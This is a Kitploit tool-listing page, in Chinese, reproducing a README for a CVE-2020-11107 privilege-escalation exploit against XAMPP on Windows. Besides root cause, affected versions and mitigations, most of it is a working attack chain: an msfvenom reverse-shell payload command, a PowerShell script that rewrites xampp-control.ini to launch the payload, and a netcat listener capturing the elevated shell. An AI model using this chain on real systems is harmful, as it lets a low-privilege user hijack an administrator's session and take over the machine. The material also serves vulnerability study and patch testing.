Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-本地权限提升-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
工具/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
权限提升Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

CVE-2020-11107-本地权限提升-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
17个月前尚未审核

🧨 CVE-2020-11107 – XAMPP 本地权限提升 (Windows)

📌 概述

CVE-2020-11107 是一个影响 Windows 上 Apache Friends XAMPP 的 本地权限提升 (LPE) 漏洞。

非特权用户可以修改 XAMPP 控制面板配置文件 (xampp-control.ini),并将默认编辑器可执行文件 (notepad.exe) 替换为恶意可执行文件。
当另一个用户(例如管理员)通过控制面板打开日志时,恶意二进制文件会以受害者的权限执行,从而导致权限提升。

❗ 该漏洞不影响 Linux 或 macOS。


🎯 受影响版本

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

测试环境

  • Windows 10
  • XAMPP 7.3.10

🧠 根本原因

  • xampp-control.ini 全局可写
  • 编辑器/浏览器路径被信任并执行
  • 配置更改会影响所有用户
  • 可执行路径未经验证

🗂 重要文件

root@kitploit:~
C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 漏洞证明

验证 XAMPP 版本:

root@kitploit:~
type C:\xampp\properties.ini

示例输出:

root@kitploit:~
base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ 该版本存在漏洞。


⚔️ 利用步骤 (PoC)

1️⃣ 生成恶意载荷 (攻击者 – Kali)

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ 将载荷传输到目标

root@kitploit:~
mkdir C:\temp
# Upload msf.exe into C:\temp

3️⃣ 修改 XAMPP 配置 (低权限用户)

利用脚本 (PowerShell):

root@kitploit:~
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

运行脚本:

root@kitploit:~
powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ 触发执行 (受害者/管理员)

受害者启动:

root@kitploit:~
C:\xampp\xampp-control.exe

然后从控制面板打开任意日志文件。


5️⃣ 捕获 Shell (攻击者)

root@kitploit:~
nc -lvnp 4444

✅ 结果:

root@kitploit:~
Connection received...
C:\WINDOWS\system32>

🎉 权限提升成功


📈 影响

  • 本地权限提升
  • 任意命令执行
  • 完全系统入侵 (如果管理员触发)

🛡 缓解措施

  • 将 XAMPP 更新到以下版本之一(或更新版本):

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • 限制以下文件的权限:

root@kitploit:~
C:\xampp\xampp-control.ini
  • 避免以管理员身份运行 XAMPP 控制面板

📚 参考资料

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • Apache Friends 公告: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • 原始研究: https://github.com/S1lkys/CVE-2020-11107
下载工具